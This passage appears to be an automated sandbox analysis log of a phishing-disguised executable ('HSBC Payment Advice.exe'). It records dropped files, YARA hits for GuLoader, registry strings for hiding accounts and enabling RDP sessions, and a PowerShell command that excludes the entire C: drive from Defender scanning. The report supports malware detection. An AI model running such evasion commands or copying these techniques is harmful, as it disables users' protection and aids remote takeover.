              Source: HSBC Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
              Source: C:\ProgramData\images.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe" Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1Jump to behavior
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

              Data Obfuscation:

              barindex
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
              Yara detected VB6 Downloader GenericShow sources
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402440 push 0040119Ah; ret 0_2_00402453
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00407A43 push ecx; ret 0_2_00407A44
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402454 push 0040119Ah; ret 0_2_00402467
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402468 push 0040119Ah; ret 0_2_0040247B
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00407E78 push 4EEBB783h; ret 0_2_00407E7D
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405679 push ds; iretd 0_2_00405762
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040247C push 0040119Ah; ret 0_2_0040248F
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402418 push 0040119Ah; ret 0_2_0040242B
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040242C push 0040119Ah; ret 0_2_0040243F
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024CC push 0040119Ah; ret 0_2_004024DF
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024E0 push 0040119Ah; ret 0_2_004024F3
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024F4 push 0040119Ah; ret 0_2_00402507
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402490 push 0040119Ah; ret 0_2_004024A3
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405692 push ds; iretd 0_2_00405762
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00408A9F push 3A3ADF06h; retf 0_2_00408AA7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024A4 push 0040119Ah; ret 0_2_004024B7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024B8 push 0040119Ah; ret 0_2_004024CB
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023C8 push 0040119Ah; ret 0_2_004023DB
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023DC push 0040119Ah; ret 0_2_004023EF
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004095E9 push ebp; iretd 0_2_004095EA
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004063EC push ecx; iretd 0_2_004063ED
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023FF push 0040119Ah; ret 0_2_00402417
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023AF push 0040119Ah; ret 0_2_004023C7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 12_2_017B01D0 push ebx; retf 12_2_017B01D9
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1819 push ss; iretd 28_2_017A1CFC
              Source: C:\ProgramData\images.exeCode function: 28_2_017A0877 push ds; iretd 28_2_017A0973
              Source: C:\ProgramData\images.exeCode function: 28_2_017A20E4 push ds; ret 28_2_017A20E5
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1CDB push ss; iretd 28_2_017A1CFC
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1C97 push ss; iretd 28_2_017A1CFC
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\ProgramData\images.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\ProgramData\images.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Contains functionality to hide user accountsShow sources
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior